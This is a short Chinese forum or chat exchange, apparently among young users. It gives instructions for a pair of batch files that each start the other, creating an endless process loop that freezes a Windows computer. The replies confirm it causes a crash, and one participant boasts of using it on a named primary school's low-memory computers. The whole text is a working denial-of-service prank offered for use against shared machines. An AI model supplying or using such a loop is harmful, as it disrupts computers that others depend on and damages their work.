先建一个1.bat内容如下:
start 2.bat
再建一个2.bat内容如下:
start 1.bat
一定要放在同一个目录里,不然运行不起来
会出教程的
厉害
然后会发生什么?
互相调用,无限运行
电脑是会死机吧!
西林小学的电脑运行内存才1GB,还不够我塞牙缝呢!